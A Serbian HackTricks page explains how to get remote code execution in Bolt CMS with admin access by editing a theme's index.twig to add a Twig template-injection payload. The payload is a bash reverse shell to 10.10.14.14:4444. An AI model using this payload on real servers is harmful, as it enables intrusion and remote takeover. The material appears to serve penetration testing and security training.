Bolt CMS

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu Proverite PLANOVE ZA PRIJAVU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

RCE

Nakon prijave kao admin (idite na /bot da pristupite prozoru za prijavu), možete dobiti RCE u Bolt CMS-u:

Izaberite Konfiguracija -> Pregled konfiguracije -> Glavna konfiguracija ili idite na URL putanju /bolt/file-edit/config?file=/bolt/config.yaml
Proverite vrednost teme

Izaberite Upravljanje fajlovima -> Pregledaj & izmeni šablone
Izaberite temelj teme pronađen u prethodnom koraku (base-2021 u ovom slučaju) i izaberite index.twig
U mom slučaju, ovo se nalazi na URL putanji /bolt/file-edit/themes?file=/base-2021/index.twig
Postavite svoj payload u ovom fajlu putem ubacivanja šablona (Twig), kao: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
I sačuvajte promene

Obrišite keš u Održavanje -> Obriši keš
Ponovo pristupite stranici kao običan korisnik, i payload bi trebalo da bude izvršen